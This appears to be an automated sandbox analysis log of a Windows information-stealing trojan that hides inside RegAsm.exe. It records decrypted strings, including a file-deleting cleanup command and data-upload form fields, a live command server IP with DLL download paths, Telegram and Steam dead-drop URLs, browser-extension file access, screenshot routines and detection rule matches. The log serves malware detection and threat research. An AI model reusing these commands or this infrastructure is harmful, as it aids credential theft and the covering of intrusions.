                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: https
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: POST
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HTTP/1.1
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: hwid
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: build
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: token
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: file_name
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: file
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: message
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407E41 CryptUnprotectData,LocalAlloc,LocalFree,2_2_00407E41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041302D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_0041302D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407DC2 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00407DC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040AB80 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,2_2_0040AB80
                Source: 56bDgH9sMQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: 56bDgH9sMQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.dr
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C7D43A FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00C7D43A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409FC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C039 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040C039
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004164C7 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004164C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BC98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416D7D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00416D7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040D690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040C6B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004177D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_004177D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041738D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_0041738D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004169EC GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,2_2_004169EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                Networking

                Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199707802586
                Source: Malware configuration extractor URLs: https://t.me/g067n
                Source: global traffic TCP traffic: 192.168.2.4:49732 -> 195.201.251.214:9000
                Source: global traffic HTTP traffic detected: GET /g067n HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
                Source: Joe Sandbox View IP Address: 195.201.251.214
                Source: Joe Sandbox View IP Address: 149.154.167.99
                Source: Joe Sandbox View ASN Name: TELEGRAMRU
                Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 195.201.251.214
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004058C4 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_004058C4
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabU
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: RegAsm.exe, 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214/
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/0cosoft
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/9zn
                Source: RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/:9000
                Source: RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/Mac
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/O
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dll
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllatch
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllffsets
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllge
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllm
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/freebl3.dllu
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/icrosoft
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/l
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/mozglue.dll
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/mozglue.dlla
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/mozglue.dllge
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/mozglue.dllo
                Source: RegAsm.exe, 00000002.00000002.3052745059.0000000001135000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/msvcp140.dll
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/msvcp140.dlle
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/msvcp140.dllet
                Source: RegAsm.exe, 00000002.00000002.3052745059.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nes
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nss3.dll
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nss3.dllA
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nss3.dllU
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nss3.dllo
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001056000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/nzC
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/softokn3.dll
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/softokn3.dllV
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/softokn3.dlle
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/softokn3.dllll
                Source: RegAsm.exe, 00000002.00000002.3052745059.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/sqlt.dll
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dll
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dllD
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dller
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dlls
                Source: RegAsm.exe, 00000002.00000002.3052807408.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/vcruntime140.dllt
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000/y
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:900030cle
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000Google
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000Microsoft
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://195.201.251.214:9000g
                Source: BGDAAK.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: BGDAAK.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: BGDAAK.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: BGDAAK.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: BGDAAK.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: BGDAAK.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: BGDAAK.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 56bDgH9sMQ.exe, 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199707802586
                Source: 56bDgH9sMQ.exe, 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3055858373.00000000196AC000.00000004.00000020.00020000.00000000.sdmp, BAKFCB.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: BAKFCB.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3055858373.00000000196AC000.00000004.00000020.00020000.00000000.sdmp, BAKFCB.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: BAKFCB.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: RegAsm.exe, 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: RegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/g067n
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/g067nJt
                Source: 56bDgH9sMQ.exe, 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/g067nry1neMozilla/5.0
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/pjm
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: BGDAAK.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: BGDAAK.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00413160 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_00413160

                System Summary

                Source: 2.2.RegAsm.exe.42e038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                Source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTRMatched rule: Detects Molerats sample - July 2017 Author: Florian Roth
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: String function: 00C69B60 appears 53 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FA21C2B appears 47 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FC006B1 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FA2415B appears 118 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00404239 appears 287 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FA2395E appears 78 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FA21F5A appears 31 times
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 324
                Source: 56bDgH9sMQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 2.2.RegAsm.exe.42e038.1.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTRMatched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@6/14@5/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041246A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_0041246A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004129BF CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,2_2_004129BF
